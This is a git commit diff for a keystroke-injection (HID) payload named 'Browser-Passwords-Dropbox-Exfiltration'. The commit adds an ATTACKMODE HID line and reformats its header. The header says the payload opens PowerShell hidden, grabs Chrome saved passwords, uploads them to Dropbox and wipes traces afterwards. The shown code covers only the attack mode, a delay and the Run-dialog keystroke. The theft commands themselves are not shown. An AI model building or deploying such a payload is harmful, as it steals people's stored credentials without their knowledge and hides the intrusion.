Added ATTACKMODE and improved comments/info.
parent
a034ebd371
commit
ef6c38af7a
|
@ -1,23 +1,20 @@
|
|||
#########################################################################################################
|
||||
# | #
|
||||
# Title : Browser-Passwords-Dropbox-Exfiltration | ____ _____ ______ #
|
||||
# Author : DIYS.py | | _ \_ _\ \ / / ___| _ __ _ _ #
|
||||
# Version : 1.0 | | | | | | \ V /\___ \ | '_ \| | | | #
|
||||
# Category : Credentials, Exfiltration | | |_| | | | | ___) || |_) | |_| | #
|
||||
# Target : Windows 10 | |____/___| |_| |____(_) .__/ \__, | #
|
||||
# Mode : HID | |_| |___/ #
|
||||
# Props : I am Jakoby, NULLSESSION0X | #
|
||||
# | #
|
||||
#########################################################################################################
|
||||
|
||||
REM Title: Browser-Passwords-Dropbox-Exfiltration
|
||||
REM Author: DIYS.py
|
||||
REM Description: Opens PowerShell hidden, grabs Chrome passwords, saves as a cleartext file and exfiltrates info via Dropbox.
|
||||
REM Then it cleans up traces of what you have done after.
|
||||
REM Target: Windows 10 (PowerShell + Chrome)
|
||||
REM Version: 1.0
|
||||
REM Category: Credentials, Exfiltration
|
||||
REM #########################################################################################################
|
||||
REM # | #
|
||||
REM # Title : Browser-Passwords-Dropbox-Exfiltration | ____ _____ ______ #
|
||||
REM # Author : DIYS.py | | _ \_ _\ \ / / ___| _ __ _ _ #
|
||||
REM # Version : 1.0 | | | | | | \ V /\___ \ | '_ \| | | | #
|
||||
REM # Category : Credentials, Exfiltration | | |_| | | | | ___) || |_) | |_| | #
|
||||
REM # Target : Windows 10 (PowerShell + Chrome) | |____/___| |_| |____(_) .__/ \__, | #
|
||||
REM # Mode : HID | |_| |___/ #
|
||||
REM # Props : I am Jakoby, NULLSESSION0X | #
|
||||
REM # Description : Opens PowerShell hidden, grabs Chrome | #
|
||||
REM # passwords, saves as a cleartext file and | #
|
||||
REM # exfiltrates info via Dropbox. | #
|
||||
REM # Then it cleans up traces of what you have done | #
|
||||
REM # after. | #
|
||||
REM #########################################################################################################
|
||||
|
||||
ATTACKMODE HID
|
||||
|
||||
DELAY 3000
|
||||
GUI r
|
||||
|
|
Loading…
Reference in New Issue